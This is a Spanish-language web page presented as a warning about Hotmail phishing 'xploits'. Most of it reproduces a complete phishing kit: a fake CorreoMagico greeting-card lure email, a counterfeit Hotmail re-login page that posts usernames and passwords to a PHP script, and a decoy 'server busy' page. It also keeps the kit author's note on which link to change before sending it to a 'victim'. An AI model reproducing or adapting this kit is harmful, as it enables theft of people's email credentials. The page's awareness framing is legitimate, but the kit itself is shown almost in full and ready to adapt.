El otro dia estaba utilizando el buscador Google y se me ocurrio
buscar lo siguiente "xploit hotmail" solo para ver cuantos resultados
me devolvia:
Resultados
1 - 10 de aproximadamente 44.800 de xploit hotmail. (0,12 segundos)
Para no estar durante años recorriendo todas las opciones ingrese al
primero en toda la lista y he aqui que alguien ofrecia el codigo de distintos
archivos, los cuales actuando juntos no eran mas que un xploit, lo llamativo
es que no solo te daban el xploit(que por lo general es lo que todos descargan
cuando quieren ingresar a un correo ajeno) si no que tambien mostraba el codigo
de los archivos que prosesaban el envio, si no entendiste nada y solo queres
saber el aspecto del xploit pincha
AQUI.
Al final decidi seguir investigando y empeze a armar una especie de base de
datos con los codigos de los xploit que encontraba, muchos de los cuales decian
ser el xpliot definitvo o el mejor del momento o hasta el revolucionario.
Ahora lo que voy a hacer es ir presentando los distintos Xploits, su aspecto
y su codigo para que nadie de ustedes caiga en la mala idea de contestarlos.
En este caso les presento los codigos obtenidos de:
Xploit Hotmail de la Postal(clic para ver su
aspecto)
y los comentarios realizados por su autor o su copiador, en todo caso la persona
que los coloco en la web para que todo el mundo, incluidos nosotros, sepamos
como son y como funcionan.
Para
ver el aspecto del Xploit Hotmail de la Postal
En adelante los codigos fuente:
Mensaje
del autor:
| Este
Xploit funciona muy bien... Primero
que nada les mando el mensaje (el mail) que debemos enviar a la victima
, hay que fijarse que este esta configurado con la direccion donde
se encuentra el archivo "envio.htm" el cual se puede modificar
en donde lo hayamos puesto nosotros:
|
Mensaje para la victima:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-
1252">
<meta name="GENERATOR" content="Microsoft FrontPage
5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>
<body>
<PRE>¡Felicitaciones! Acabás de recibir una tarjeta
animada
y musicalizada
de El amor de tu vida, atención de CorreoMagico.com
Para ver tu tarjeta personal cliqueá en el siguiente link:
<a target="_blank" href="http://www.infobugs.com.ar/ha2/alen/envio.htm">http:
//www.correomagduendeico.com.ar/recibida.asp?id=3D200109261
VHDE</a> (Tu tarjeta estará disponible durante los
próximos 90 días) Gracias por usar CorreoMagico.com.
Es fácil. Es gratis. ¡Es mágico!
¿Necesitás
ayuda?
Si no lográs ver tu tarjeta cliqueando en el link arriba indicado,
copiá la clave de tu tarjeta que aparece a continuación:
200109261VHDE,
entrá a la Home Page de CorreoMagico (www.correomagico.com.ar)
ingresá la clave en el casillero indicado (en la parte superior
derecha
de la página) y apretá 'Buscar'.
Es así de fácil. Podés buscar tu tarjeta desde
cualquier computadora
conectada a internet.
****************************************
Congratulations!
You have just received an animated musical greeting
card from El amor de tu vida, courtesy of CorreoMagico.com
To view your personal greeting click on the following link:
<a target="_blank" href="http://www.infobugs.com.ar/ha2/alen/envio.htm">http://
www.correomagico.com.ar/recibida.asp?id=3D200109261VHDE</a>
(Your card will be available during the next 90 days).
Thanks for using CorreoMagico.com. It's easy. It's free. It's magic!
Need
some help?
If you cannot see your card clicking on the link above,
just copy the following card ID: 200109261VHDE,
enter CorreoMagico´s home page (www.correomagico.com.ar)
enter the card ID on the indicated cell (on the top and
to the right of the page) and press 'Buscar'.
It´s that easy. You can view your card from any computer with
an
internet connection.
</PRE>
</body>
</html>
|
Lo unico que habria que cambiar seria esto:
| <a
target="_blank" href="http://www.infobugs.com.ar/ha2/alen/envio.htm"> |
Archivo envio.htm:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage
4.0">
<title>Hotmail - Vuelva a escribir su contraseña</title>
<!-- saved from url=(0051)http://lc2.law13.hotmail.passport.com/cgi-bin/login
-->
<!-- reauthhead.asp -->
<link href="http://64.4.18.24/Hotmai_archivos/hotmail___7.css"
rel=stylesheet>
</head>
<body bgcolor="#FFFFFF" topMargin="0">
<center><table BORDER=0 CELLSPACING=2 CELLPADDING=0 WIDTH="590"
>
<tr>
<td COLSPAN="2">
<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%"
>
<tr>
<td><a href="http://lc2.law13.hotmail.passport.com/cgi-bin/login?_
lang=ES" target="_top"><img SRC="http://64.4.18.24/logo_msnhmr_468x60.gif
" NOSAVE BORDER=0 height=60 width=468></a></td>
<td ALIGN=CENTER NOWRAP><img SRC="http://64.4.18.24/logo_passport_140x44.g
if" ALT="Descubra más acerca de Passport" NOSAVE
BORDER=0 height=44 width=140>
<br><font size=-1><a href="http://nexusrdr.passport.com/redir.asp?_lang=ES&pm=id
%3d2%26fs%3d1%26cb%3d
_lang%253dES%26ct%3d1018127971&attrib=Help" target="_top">Ayuda</a></font></td>
</tr>
</table>
</td>
</tr>
<tr>
<td BGCOLOR="#93BEE2" style="PADDING-RIGHT: 3px; PADDING-LEFT:
3px; PADDING-BOTTOM: 3
px; PADDING-TOP: 3px"><b><font size="+0">Se
encuentra en un sitio fuera de Hotmail. Por favor nuevamente escriba
su nombre
de usuario y contraseña para poder ver este sitio</font>.</b></td>
<td VALIGN=TOP></td>
</tr>
<tr>
<td HEIGHT="6"></td>
</tr>
<tr VALIGN=TOP>
<td><form method="post" action="correo.php">
</form>
<input type="hidden" name="recipient">
<table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%"
>
<tr>
<td>Nombre de usuario</td>
<td><input type="usuario" name="nombredeusuario"
size="30"></td>
</tr>
<tr>
<td>Contraseña</td>
<td><input type="password" name="estado"
size="30"></td>
</tr>
<tr>
<td></td>
<td>
<br><input type="submit" value="Aceptar"><input
type="reset" value="Cancelar"></form></td>
</tr>
</table>
</td>
<td ROWSPAN="4"></td>
</tr>
<tr>
<td></td>
</tr>
</table></center>
<center><table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="590">
<tr>
<td> © 2002 Microsoft Corporation.Reservados todos los derechos.
<br><a href="http://g.msn.com/1HM506701/D" target="_top">CONDICIONES
DE
USO</a> <a href="http://g.msn.com/1HM506701/C" target="_top">Declaración
de privacidad con aprobación de TRUSTe</a></td>
</tr>
</table></center>
</body>
</html>
|
Fijense en esta linea:
| <form
method="post" action="correo.php"><input type="hidden"
name="recipient"> |
Archivo correo.php:
<HTML>
<HEAD>
<TITLE> ERROR 504 - </TITLE>
<META NAME="Description" CONTENT="Comentarios y sugerencias">
</HEAD> <BODY
BGCOLOR="#FFFFFF" text="#000000">
<center>
<table width="100%" bgcolor="black" cellspacing=0
cellpadding=0 valign=center border=0><tr>
<td bgcolor="#EBD5DF"><center>
<b><font face="Verdana" size="2">Sorry
this server is too busy, please try again later..</font></b></td></tr></table>
<CENTER>
<BR>
<font face="Arial,verdana,helvica,san serif" size="2">Sorry
this server is too busy, please try again later..</font>
</CENTER>
<p><br>
</center>
</BODY>
</HTML>
|
